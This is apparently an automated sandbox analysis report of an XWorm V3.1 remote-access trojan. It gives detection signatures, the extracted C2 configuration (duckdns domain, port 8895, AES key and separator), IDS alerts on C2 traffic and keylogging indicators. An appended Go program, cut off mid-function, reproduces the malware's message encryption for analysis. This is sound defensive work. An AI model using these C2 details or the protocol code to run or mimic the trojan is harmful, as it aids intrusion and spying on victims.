Windows Analysis Report
171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe

Overview

General Information

Sample name: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Analysis ID: 1432799
MD5: d80a57c22c976dd67cb96f64e009e923
SHA1: ceb8be5527547cfeb3f20b273017f05d81bd0624
SHA256: ba85829ab0137d7f35c619f1d716de735d57a2ab9a4e6dd83950f96af1407a6b
Tags: base64-decodedexe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Uses dynamic DNS services
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses 32bit PE files
Yara signature match

Classification

AV Detection

Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Avira: detected
Source: nmds.duckdns.org Avira URL Cloud: Label: malware
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source: nmds.duckdns.org Virustotal: Detection: 15%
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe ReversingLabs: Detection: 81%
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Virustotal: Detection: 80%
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Joe Sandbox ML: detected
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: nmds.duckdns.org
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: 8895
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: <123456789>
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: <Xwormmm>
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: USB.exe
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.56.8.114:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.56.8.114:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88CE39h 0_2_00007FFD9B88C7F9
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88CE4Ah 0_2_00007FFD9B88C7F9
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B890F61
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88F991h 0_2_00007FFD9B88D28D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88FCADh 0_2_00007FFD9B88D28D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then mov eax, dword ptr [ebp-44h] 0_2_00007FFD9B88D28D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B893382h 0_2_00007FFD9B8931EC
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88C222h 0_2_00007FFD9B88C09F
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B8911B9
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B8910FA
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B891155
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B891093

Networking

Source: Traffic Snort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.4:49730 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2853191 ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound 87.121.105.4:8895 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 87.121.105.4:8895 -> 192.168.2.4:49746
Source: Traffic Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.4:49746 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49746 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 87.121.105.4:8895 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 87.121.105.4:8895 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.4:49750 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49750 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 87.121.105.4:8895
Source: Malware configuration extractor URLs: nmds.duckdns.org
Source: unknown DNS query: name: nmds.duckdns.org
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 87.121.105.4:8895
Source: Joe Sandbox View IP Address: 87.121.105.4 87.121.105.4
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View ASN Name: NET1-ASBG NET1-ASBG
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 23.199.71.185
Source: unknown TCP traffic detected without corresponding DNS query: 23.199.71.184
Source: global traffic HTTP traffic detected:
    GET /async/ddljson?async=ntp:2 HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /async/newtab_promos HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1
    Host: apis.google.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
    Range: bytes=0-2147483646
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
Source: global traffic HTTP traffic detected:
    GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePH36pyBPCcPnFr&MD=c6hfexxl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected:
    GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePH36pyBPCcPnFr&MD=c6hfexxl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic DNS traffic detected: DNS query: nmds.duckdns.org
Source: global traffic DNS traffic detected: DNS query: google.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4096024846.00000000024E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chromecache_51.4.dr String found in binary or memory: http://www.broofa.com
Source: chromecache_56.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_56.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_56.4.dr, chromecache_51.4.dr String found in binary or memory: https://apis.google.com
Source: chromecache_56.4.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_56.4.dr String found in binary or memory: https://content.googleapis.com
Source: chromecache_56.4.dr String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: chromecache_56.4.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: chromecache_51.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_51.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_51.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_51.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: chromecache_51.4.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_56.4.dr String found in binary or memory: https://plus.google.com
Source: chromecache_56.4.dr String found in binary or memory: https://plus.googleapis.com
Source: chromecache_56.4.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: chromecache_56.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_56.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_51.4.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_51.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_51.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 23.56.8.114:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.56.8.114:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, XLogger.cs .Net Code: KeyboardLayout

System Summary

Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B88D28D 0_2_00007FFD9B88D28D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B887282 0_2_00007FFD9B887282
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B88A99E 0_2_00007FFD9B88A99E
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B88946D 0_2_00007FFD9B88946D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B8864D6 0_2_00007FFD9B8864D6
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameXwrm3.1.exe4 vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4097692510.000000001BD80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameFileManager.dll8 vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4099447326.000000001C090000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Binary or memory string: OriginalFilenameXwrm3.1.exe4 vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1bd80000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1bd80000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1c090000.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1c090000.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
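The configuration extractor in the AV Detection section recovered the "Aes key" <123456789> and the field separator (SPL) <Xwormmm> for this sample, and the Cryptographic APIs lines above show the encryption living in AlgorithmAES.cs and Helper.cs (TransformFinalBlock). The Go program below is an added analyst-side example, not code from this report or from the malware: it turns the recovered key string into the AES key, decrypts a Base64 message and splits it on the SPL token. The key schedule it implements (MD5 of the key string written at offset 0 and again at offset 15 of a 32-byte buffer, AES-256-ECB, PKCS#7 padding, Base64) is the one publicly documented for the XWorm family; treat it as an assumption to confirm against this sample's AlgorithmAES.cs before relying on it. The message it decrypts is constructed inside the program, because the report contains no captured 8895/tcp payload, and any on-wire framing (the Snort "Generic Prefix Bytes" hits point to a prefix ahead of the ciphertext) is assumed to have been stripped already. The MALWARE_Win_AsyncRAT matches above are not a contradiction of the XWorm verdict: that rule is widely reported to fire on XWorm, whose code base borrows from AsyncRAT.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/md5"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// Values recovered by the report's configuration extractor and string decryptor.
const (
	XWormKey = "<123456789>" // "Aes key" field
	XWormSPL = "<Xwormmm>"   // "SPL" field: separator between message fields
)

// DeriveKey turns the configured key string into the 32-byte AES key.
// Scheme (public XWorm analyses; assumption for this sample, confirm against
// its AlgorithmAES.cs): MD5 of the key string is written at offset 0 and again
// at offset 15, so byte 15 is overwritten by the first digest byte and byte 31
// stays zero.
func DeriveKey(keyString string) []byte {
	sum := md5.Sum([]byte(keyString))
	key := make([]byte, 32)
	copy(key[0:], sum[:])
	copy(key[15:], sum[:]) // fills key[15..30]; key[31] remains 0
	return key
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	out := make([]byte, 0, len(b)+n)
	out = append(out, b...)
	return append(out, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the block size")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, errors.New("invalid PKCS#7 padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("invalid PKCS#7 padding")
		}
	}
	return b[:len(b)-n], nil
}

// EncryptMessage mirrors the client side (AES-256-ECB, PKCS#7, Base64) so the
// demo can fabricate a message; the report carries no captured C2 payload.
func EncryptMessage(keyString, plaintext string) (string, error) {
	block, err := aes.NewCipher(DeriveKey(keyString))
	if err != nil {
		return "", err
	}
	in := pkcs7Pad([]byte(plaintext))
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += aes.BlockSize {
		block.Encrypt(out[i:i+aes.BlockSize], in[i:i+aes.BlockSize])
	}
	return base64.StdEncoding.EncodeToString(out), nil
}

// DecryptMessage is what an analyst runs over a Base64 blob lifted from the
// 8895/tcp stream (framing already removed) or from the binary's Settings strings.
func DecryptMessage(keyString, b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
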